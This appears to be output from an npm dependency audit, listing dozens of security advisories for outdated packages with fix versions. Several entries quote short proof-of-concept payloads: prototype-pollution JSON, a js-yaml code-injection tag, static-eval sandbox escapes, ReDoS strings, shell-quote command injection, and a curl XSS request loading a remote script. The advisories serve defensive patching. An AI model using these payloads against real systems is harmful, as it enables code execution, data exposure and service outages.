Security Alert: [low] [braces] Type: Regular Expression Denial of Service Advisory Version: <2.3.1 Current version: 1.8.5 Recommendation: Upgrade to version 2.3.1 or higher. Url: https://npmjs.com/advisories/786 Detail: Versions of `braces` prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service. Security Alert: [high] [cryptiles] Type: Insufficient Entropy Advisory Version: >=3.1.0 <3.1.3 || >=4.0.0 <4.1.2 Current version: 3.1.2 Recommendation: Update to version 3.1.3 or 4.1.2 or later. Url: https://npmjs.com/advisories/720 Detail: Versions of `cryptiles` from version 3.1.0 through 3.1.2, and versions 4.0.0 to version 4.1.1 are vulnerable to insufficient entropy. The `randomDigits` method generates digits that lack a perfect distribution over enough attempts. Security Alert: [low] [deep-extend] Type: Prototype Pollution Advisory Version: <=0.5.0 Current version: 0.4.2 Recommendation: Update to version 0.5.1 or later. Url: https://npmjs.com/advisories/612 Detail: Versions of `deep-extend` before 0.5.1 are vulnerable to prototype pollution. Security Alert: [high] [fstream] Type: Arbitrary File Overwrite Advisory Version: <1.0.12 Current version: 1.0.11 Recommendation: Upgrade to version 1.0.12 or later. Url: https://npmjs.com/advisories/886 Detail: Versions of `fstream` prior to 1.0.12 are vulnerable to Arbitrary File Overwrite. Extracting tarballs containing a hardlink to a file that already exists in the system and a file that matches the hardlink will overwrite the system's file with the co ntents of the extracted file. The `fstream.DirWriter()` function is vulnerable. Security Alert: [high] [handlebars] Type: Prototype Pollution Advisory Version: <=4.0.13 || >=4.1.0 <4.1.2 Current version: 4.0.11 Recommendation: For handlebars 4.1.x upgrade to 4.1.2 or later. For handlebars 4.0.x upgrade to 4.0.14 or later. Url: https://npmjs.com/advisories/755 Detail: Versions of `handlebars` prior to 4.0.14 are vulnerable to Prototype Pollution. Templates may alter an Objects' prototype, thus allowing an attacker to execute arbitrary code on the server. Security Alert: [moderate] [hoek] Type: Prototype Pollution Advisory Version: <= 4.2.0 || >= 5.0.0 < 5.0.3 Current version: 2.16.3 Recommendation: Update to version 4.2.1, 5.0.3 or later. Url: https://npmjs.com/advisories/566 Detail: Versions of `hoek` prior to 4.2.1 and 5.0.3 are vulnerable to prototype pollution. The `merge` function, and the `applyToDefaults` and `applyToDefaultsWithShallow` functions which leverage `merge` behind the scenes, are vulnerable to a prototype pollution attack when provided an _unvalidated_ payload created from a JSON string containing th e `__proto__` property. This can be demonstrated like so: ```javascript var Hoek = require('hoek'); var malicious_payload = '{"__proto__":{"oops":"It works !"}}'; var a = {}; console.log("Before : " + a.oops); Hoek.merge({}, JSON.parse(malicious_payload)); console.log("After : " + a.oops); ``` This type of attack can be used to overwrite existing properties causing a potential denial of service. Security Alert: [high] [js-yaml] Type: Code Injection Advisory Version: <3.13.1 Current version: 3.10.0 Recommendation: Upgrade to version 3.13.1. Url: https://npmjs.com/advisories/813 Detail: Versions of `js-yaml` prior to 3.13.1 are vulnerable to Code Injection. The `load()` function may execute arbitrary code injected through a malicious YAML file. Objects that have `toString` as key, JavaScript code as value and are used as explicit m apping keys allow attackers to execute the supplied code through the `load()` function. The `safeLoad()` function is unaffected. An example payload is `{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1` which returns the object { "1553107949161": 1 } Security Alert: [moderate] [js-yaml] Type: Denial of Service Advisory Version: <3.13.0 Current version: 3.10.0 Recommendation: Upgrade to version 3.13.0. Url: https://npmjs.com/advisories/788 Detail: Versions of `js-yaml` prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service. Security Alert: [moderate] [lodash] Type: Prototype Pollution Advisory Version: <4.17.11 Current version: 4.17.4 Recommendation: Update to version 4.17.11 or later. Url: https://npmjs.com/advisories/782 Detail: Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects. Security Alert: [low] [lodash] Type: Prototype Pollution Advisory Version: <4.17.5 Current version: 4.17.4 Recommendation: Update to version 4.17.5 or later. Url: https://npmjs.com/advisories/577 Detail: Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects. Security Alert: [low] [merge] Type: Prototype Pollution Advisory Version: <=1.2.0 Current version: 1.2.0 Recommendation: Update to version 1.2.1 or later. Url: https://npmjs.com/advisories/722 Detail: Versions of `merge` before 1.2.1 are vulnerable to prototype pollution. The `merge.recursive` function can be tricked into adding or modifying properties of the Object prototype. Security Alert: [low] [randomatic] Type: Cryptographically Weak PRNG Advisory Version: <3.0.0 Current version: 1.1.7 Recommendation: Update to version 3.0.0 or later. Url: https://npmjs.com/advisories/157 Detail: Affected versions of `randomatic` generate random values using a cryptographically weak psuedo-random number generator. This may result in predictable values instead of random values as intended. Security Alert: [high] [sshpk] Type: Regular Expression Denial of Service Advisory Version: <1.13.2 || >=1.14.0 <1.14.1 Current version: 1.13.1 Recommendation: Update to version 1.13.2, 1.14.1 or later. Url: https://npmjs.com/advisories/606 Detail: Versions of `sshpk` before 1.13.2 or 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys. Security Alert: [moderate] [stringstream] Type: Out-of-bounds Read Advisory Version: <=0.0.5 Current version: 0.0.5 Recommendation: No fix is currently available for this vulnerability. It is our recommendation to not install or use this module if user input is being passed in to `stringstream`. Url: https://npmjs.com/advisories/664 Detail: All versions of `stringstream` are vulnerable to out-of-bounds read as it allocates uninitialized Buffers when number is passed in input stream on Node.js 4.x and below. Security Alert: [high] [tar] Type: Arbitrary File Overwrite Advisory Version: <2.2.2 || >=3.0.0 <4.4.2 Current version: 2.2.1 Recommendation: For tar 4.x, upgrade to version 4.4.2 or later. For tar 2.x, upgrade to version 2.2.2 or later. Url: https://npmjs.com/advisories/803 Detail: Versions of `tar` prior to 4.4.2 for 4.x and 2.2.2 for 2.x are vulnerable to Arbitrary File Overwrite. Extracting tarballs containing a hardlink to a file that already exists in the system, and a file that matches the hardlink will overwrite the sys tem's file with the contents of the extracted file. Security Alert: [high] [cached-path-relative] Type: Prototype Pollution Advisory Version: <=1.0.1 Current version: 1.0.1 Recommendation: Update to version 1.0.2 or later. Url: https://npmjs.com/advisories/739 Detail: Version of `cached-path-relative` before 1.0.2 are vulnerable to prototype pollution. Security Alert: [moderate] [concat-stream] Type: Memory Exposure Advisory Version: >=1.3.0 <1.3.2 || >=1.4.0 <1.4.11 || >=1.5.0 <1.5.2 Current version: 1.5.0 Recommendation: Update to version 1.5.2, 1.4.11, 1.3.2 or later. If you are unable to update make sure user provided input into the `write()` function is not a number. Url: https://npmjs.com/advisories/597 Detail: Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()` Versions <1.3.0 are not affected due to not using unguarded Buffer constructor. Security Alert: [low] [debug] Type: Regular Expression Denial of Service Advisory Version: <= 2.6.8 || >= 3.0.0 <= 3.0.1 Current version: 0.7.4 Recommendation: Version 2.x.x: Update to version 2.6.9 or later. Version 3.x.x: Update to version 3.1.0 or later. Url: https://npmjs.com/advisories/534 Detail: Affected versions of `debug` are vulnerable to regular expression denial of service when untrusted user input is passed into the `o` formatter. As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue. Security Alert: [critical] [growl] Type: Command Injection Advisory Version: <1.10.2 Current version: 1.9.2 Recommendation: Update to version 1.10.2 or later. Url: https://npmjs.com/advisories/146 Detail: Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution. Security Alert: [moderate] [mime] Type: Regular Expression Denial of Service Advisory Version: < 1.4.1 || > 2.0.0 < 2.0.3 Current version: 1.3.6 Recommendation: Update to version 2.0.3 or later. Url: https://npmjs.com/advisories/535 Detail: Affected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input. Security Alert: [high] [parsejson] Type: Regular Expression Denial of Service Advisory Version: <=0.0.3 Current version: 0.0.3 Recommendation: The `parsejson` package has not been functionally updated since it was initially released. Additionally, it provides functionality which is natively included in Node.js, and therefore the native `JSON.parse()` should be used, for both performance and security reasons. Url: https://npmjs.com/advisories/528 Detail: Affected versions of `parsejson` are vulnerable to a regular expression denial of service when parsing untrusted user input. Security Alert: [moderate] [static-eval] Type: Sandbox Breakout / Arbitrary Code Execution Advisory Version: <=2.0.1 Current version: 0.2.4 Recommendation: Upgrade to version 2.0.2 or later. Url: https://npmjs.com/advisories/758 Detail: Versions of `static-eval`prior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package. ## Proof of concept ``` var evaluate = require('static-eval'); var parse = require('esprima').parse; var src = process.argv[2]; var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()' var ast = parse(payload).body[0].expression; console.log(evaluate(ast, {x:1})); ``` Security Alert: [moderate] [static-eval] Type: Sandbox Breakout / Arbitrary Code Execution Advisory Version: <=1.1.1 Current version: 0.2.4 Recommendation: Update to version 2.0.0 or later. Url: https://npmjs.com/advisories/548 Detail: Affected versions of `static-eval` pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package. ## Proof of concept ``` var evaluate = require('static-eval'); var parse = require('esprima').parse; var src = '(function(){console.log(process.pid)})()'; var ast = parse(src).body[0].expression; var res = evaluate(ast, {}); // Will print the process id ``` Security Alert: [high] [tough-cookie] Type: Regular Expression Denial of Service Advisory Version: <2.3.3 Current version: 2.3.2 Recommendation: Update to version 2.3.3 or later. Url: https://npmjs.com/advisories/525 Detail: Affected versions of `tough-cookie` are susceptible to a regular expression denial of service. The amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length. If node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node. Security Alert: [moderate] [tunnel-agent] Type: Memory Exposure Advisory Version: <0.6.0 Current version: 0.4.3 Recommendation: Update to version 0.6.0 or later. Url: https://npmjs.com/advisories/598 Detail: Versions of `tunnel-agent` before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number. Proof-of-concept: ```js require('request')({ method: 'GET', uri: 'http://www.example.com', tunnel: true, proxy:{ protocol: 'http:', host:'127.0.0.1', port:8080, auth:USERSUPPLIEDINPUT // number } }); ``` Security Alert: [high] [ws] Type: Denial of Service Advisory Version: <1.1.5 || >=2.0.0 <3.3.1 Current version: 1.1.2 Recommendation: Update to version 3.3.1 or later. Url: https://npmjs.com/advisories/550 Detail: Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r\n' ].join('\r\n'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` Security Alert: [high] [https-proxy-agent] Type: Denial of Service Advisory Version: <=2.1.1 Current version: 1.0.0 Recommendation: Update to version 2.2.0 or later. Url: https://npmjs.com/advisories/593 Detail: Versions of `https-proxy-agent` before 2.2.0 are vulnerable to denial of service. This is due to unsanitized options (proxy.auth) being passed to `Buffer()`. Security Alert: [moderate] [axios] Type: Denial of Service Advisory Version: <0.18.1 Current version: 0.18.0 Recommendation: Upgrade to 0.18.1 or later. Url: https://npmjs.com/advisories/880 Detail: Versions of `axios` prior to 0.18.1 are vulnerable to Denial of Service. If a request exceeds the `maxContentLength` property, the package prints an error but does not stop the request. This may cause high CPU usage and lead to Denial of Service. Security Alert: [high] [base64-url] Type: Out-of-bounds Read Advisory Version: <2.0.0 Current version: 1.2.1 Recommendation: Update to version 2.0.0 or later. Url: https://npmjs.com/advisories/660 Detail: Versions of `base64-url` before 2.0.0 are vulnerable to out-of-bounds read as it allocates uninitialized Buffers when number is passed in input. Security Alert: [low] [cli] Type: Arbitrary File Write Advisory Version: <1.0.0 Current version: 0.6.6 Recommendation: Update to version 1.0.0 or later. Url: https://npmjs.com/advisories/95 Detail: Affected versions of `cli` use predictable temporary file names. If an attacker can create a symbolic link at the location of one of these temporarly file names, the attacker can arbitrarily write to any file that the user which owns the `cli` proce ss has permission to write to. ## Proof of Concept By creating Symbolic Links at the following locations, the target of the link can be written to. ``` lock_file = '/tmp/' + cli.app + '.pid', log_file = '/tmp/' + cli.app + '.log'; ``` Security Alert: [high] [fresh] Type: Regular Expression Denial of Service Advisory Version: < 0.5.2 Current version: 0.3.0 Recommendation: Update to version 0.5.2 or later. Url: https://npmjs.com/advisories/526 Detail: Affected versions of `fresh` are vulnerable to regular expression denial of service when parsing specially crafted user input. Security Alert: [high] [method-override] Type: Regular Expression Denial of Service Advisory Version: <= 1.0.2 || > 2.0.0 < 2.3.10 Current version: 2.3.9 Recommendation: Update to version 2.3.10 or later Url: https://npmjs.com/advisories/538 Detail: Affected versions of `method-override` are vulnerable to a regular expression denial of service vulnerability when untrusted user input is passed into the `X-HTTP-Method-Override` header. Security Alert: [high] [minimatch] Type: Regular Expression Denial of Service Advisory Version: <=3.0.1 Current version: 0.3.0 Recommendation: Update to version 3.0.2 or later. Url: https://npmjs.com/advisories/118 Detail: Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`. ## Proof of Concept ``` var minimatch = require(“minimatch”); // utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; } var exploit = “[!” + genstr(1000000, “\\”) + “A”; // minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ``` Security Alert: [moderate] [morgan] Type: Code Injection Advisory Version: <=1.9.0 Current version: 1.6.1 Recommendation: Update to version 1.9.1 or later. Url: https://npmjs.com/advisories/736 Detail: Verisons of `morgan` before 1.9.1 are vulnerable to code injection when user input is allowed into the filter or combined with a prototype pollution attack. Security Alert: [high] [negotiator] Type: Regular Expression Denial of Service Advisory Version: <= 0.6.0 Current version: 0.5.3 Recommendation: Update to version 0.6.1 or later. Url: https://npmjs.com/advisories/106 Detail: Affected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value. Security Alert: [critical] [shell-quote] Type: Potential Command Injection Advisory Version: <=1.6.0 Current version: 0.0.1 Recommendation: Update to version 1.6.1 or later. Url: https://npmjs.com/advisories/117 Detail: Affected versions of `shell-quote` do not properly escape command line arguments, which may result in command injection if the library is used to escape user input destined for use as command line arguments. ## Proof of Concept: The following characters are not escaped properly: `>`,`;`,`{`,`}` Bash has a neat but not well known feature known as "Bash Brace Expansion", wherein a sub-command can be executed without spaces by running it between a set of `{}` and using the `,` instead of ` ` to seperate arguments. Because of this, full command injectio n is possible even though it was initially thought to be impossible. ``` const quote = require('shell-quote').quote; console.log(quote(['a;{echo,test,123,234}'])); // Actual "a;{echo,test,123,234}" // Expected "a\;\{echo,test,123,234\}" // Functional Equivalent "a; echo 'test' '123' '1234'" ``` Security Alert: [low] [uglify-js] Type: Regular Expression Denial of Service Advisory Version: <2.6.0 Current version: 2.4.17 Recommendation: Update to version 2.6.0 or later. Url: https://npmjs.com/advisories/48 Detail: Versions of `uglify-js` prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the `parse()` method. ### Proof of Concept ``` var u = require('uglify-js'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;"); ``` ### Results ``` $ time node test.js 10000 real 0m1.091s user 0m1.047s sys 0m0.039s $ time node test.js 80000 real 0m6.486s user 0m6.229s sys 0m0.094s ``` Security Alert: [low] [uglify-js] Type: Incorrect Handling of Non-Boolean Comparisons During Minification Advisory Version: <= 2.4.23 Current version: 2.4.17 Recommendation: Upgrade UglifyJS to version >= 2.4.24. Url: https://npmjs.com/advisories/39 Detail: Versions of `uglify-js` prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification. Security Alert: [moderate] [underscore.string] Type: Regular Expression Denial of Service Advisory Version: <=3.3.4 Current version: 2.2.1 Recommendation: Upgrade to version 3.3.5 or higher. Url: https://npmjs.com/advisories/745 Detail: Versions of `underscore.string` prior to *3.3.5* are vulnerable to Regular Expression Denial of Service (ReDoS). The function `unescapeHTML` is vulnerable to ReDoS due to an overly-broad regex. The slowdown is approximately 2s for 50,000 characters but grows exponentially with larger inputs. Security Alert: [high] [puppeteer] Type: Use-After-Free Advisory Version: <1.13.0 Current version: 1.10.0 Recommendation: Upgrade to version 1.13.0 or later. Url: https://npmjs.com/advisories/824 Detail: Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution. Security Alert: [high] [adm-zip] Type: Arbitrary File Write via Archive Extraction Advisory Version: <0.4.9 Current version: 0.4.7 Recommendation: Update to version 0.4.9 or later. Url: https://npmjs.com/advisories/681 Detail: Versions of `adm-zip` before 0.4.9 are vulnerable to arbitrary file write when used to extract a specifically crafted archive that contains path traversal filenames (`../../file.txt` for example). Security Alert: [low] [connect] Type: methodOverride Middleware Reflected Cross-Site Scripting Advisory Version: <=2.8.0 Current version: 2.4.6 Recommendation: Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack. Url: https://npmjs.com/advisories/3 Detail: Connect is a stack of middleware that is executed in order in each request. The "methodOverride" middleware allows the http post to override the method of the request with the value of the "_method" post key or with the header "x-http-method-override". Because the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the "Cannot `[method]` `[url]`" content. The method was not prope rly encoded for output in the browser. ###Example: ``` ~ curl "localhost:3000" -d "_method=<script src=http://nodesecurity.io/xss.js></script>" Cannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> / ``` Security Alert: [moderate] [hawk] Type: Regular Expression Denial of Service Advisory Version: < 3.1.3 || >= 4.0.0 <4.1.1 Current version: 2.3.1 Recommendation: Update to hawk version 4.1.1 or later. Url: https://npmjs.com/advisories/77 Detail: Versions of `hawk` prior to 3.1.3, or 4.x prior to 4.1.1 are affected by a regular expression denial of service vulnerability related to excessively long headers and URI's. Security Alert: [critical] [open] Type: Command Injection Advisory Version: <=0.0.5 Current version: 0.0.5 Recommendation: `open` is now the deprecated `opn` package. Upgrading to the latest version is likely have unwanted effects since it now has a very different API but will prevent this vulnerability. Url: https://npmjs.com/advisories/663 Detail: Versions of `open` before 6.0.0 are vulnerable to command injection when unsanitized user input is passed in. The package does come with the following warning in the readme: ``` The same care should be taken when calling open as if you were calling child_process.exec directly. If it is an executable it will run in a new shell. ``` Security Alert: [high] [qs] Type: Denial-of-Service Memory Exhaustion Advisory Version: <1.0.0 Current version: 0.5.1 Recommendation: Update to version 1.0.0 or later. Url: https://npmjs.com/advisories/29 Detail: Versions prior to 1.0 of `qs` are affected by a denial of service condition. This condition is triggered by parsing a crafted string that deserializes into very large sparse arrays, resulting in the process running out of memory and eventually crash ing. Security Alert: [moderate] [request] Type: Remote Memory Exposure Advisory Version: >=2.2.6 <2.47.0 || >2.51.0 <=2.67.0 Current version: 2.9.203 Recommendation: Update to version 2.68.0 or later Url: https://npmjs.com/advisories/309 Detail: Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote se rver as the body. ## Proof of Concept ``` var request = require('request'); var http = require('http'); var serveFunction = function (req, res){ req.on('data', function (data) { console.log(data) }); res.end(); }; var server = http.createServer(serveFunction); server.listen(8000); request({ method: "POST", uri: 'http://localhost:8000', multipart: [{body:500}] },function(err,res,body){}); ``` Security Alert: [moderate] [semver] Type: Regular Expression Denial of Service Advisory Version: <4.3.2 Current version: 1.0.14 Recommendation: Update to version 4.3.2 or later Url: https://npmjs.com/advisories/31 Detail: Versions 4.3.1 and earlier of `semver` are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed. Security Alert: [low] [send] Type: Root Path Disclosure Advisory Version: <0.11.1 Current version: 0.0.4 Recommendation: Update to version 0.11.1 or later. Url: https://npmjs.com/advisories/56 Detail: Versions of `send` prior to 0.11.2 are affected by an information leakage vulnerability which may allow an attacker to enumerate paths on the server filesystem. Security Alert: [low] [send] Type: Directory Traversal Advisory Version: < 0.8.4 Current version: 0.0.4 Recommendation: Update to version 0.8.4 or later. Url: https://npmjs.com/advisories/32 Detail: Versions 0.8.3 and earlier of `send` are affected by a directory traversal vulnerability. When relying on the root option to restrict file access it may be possible for an application consumer to escape out of the restricted directory and access fil es in a similarly named directory. For example, `static(_dirname + '/public')` would allow access to `_dirname + '/public-restricted'`. Security Alert: [low] [timespan] Type: Regular Expression Denial of Service Advisory Version: <=99.999.99999 Current version: 2.3.0 Recommendation: No direct patch is available for this vulnerability. Currently, the best available solution is to use a functionally equivalent alternative package. It is also sufficient to ensure that user input is not being passed into `timespan`, or that the maximum length of such user input is drastically reduced. Limiting the input length to 150 characters should be sufficient in most cases. Url: https://npmjs.com/advisories/533 Detail: Affected versions of `timespan` are vulnerable to a regular expression denial of service when parsing dates. The amplification for this vulnerability is significant, with 50,000 characters resulting in the event loop being blocked for around 10 seconds. Security Alert: [high] [url-parse] Type: Open Redirect Advisory Version: <1.4.3 Current version: 1.0.5 Recommendation: Update to version 1.4.3 or later. Url: https://npmjs.com/advisories/678 Detail: Versions of `url-parse` before 1.4.3 returns the wrong hostname which could lead to Open Redirect, Server Side Request Forgery (SSRF), or Bypass Authentication Protocol vulnerabilities. Security Alert: [high] [webpack-dev-server] Type: Missing Origin Validation Advisory Version: <2.11.4 || >=3.0.0 <=3.1.10 Current version: 1.16.5 Recommendation: For `webpack-dev-server` 2.x update to version 2.11.4 or later. For `webpack-dev-server` 3.x update to version 3.1.11 or later. Url: https://npmjs.com/advisories/725 Detail: Versions of `webpack-dev-server` before 3.1.10 are missing origin validation on the websocket server. This vulnerability allows a remote attacker to steal a developer's source code because the origin of requests to the websocket server that is used for Hot Module Replacement (HMR) are not validated. Security Alert: [moderate] [brace-expansion] Type: ReDoS Advisory Version: <=1.1.6 Current version: 1.1.6 Recommendation: Update to version 1.1.7 or later. Url: https://npmjs.com/advisories/338 Detail: Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition. ## Proof of Concept ``` var expand = require('brace-expansion'); expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}'); ``` Security Alert: [moderate] [marked] Type: Regular Expression Denial of Service Advisory Version: >=0.3.14 <0.6.2 Current version: 0.5.2 Recommendation: Upgrade to version 0.6.2 or later. Url: https://npmjs.com/advisories/812 Detail: Versions of `marked` prior to 0.6.2 and later than 0.3.14 are vulnerable to Regular Expression Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion .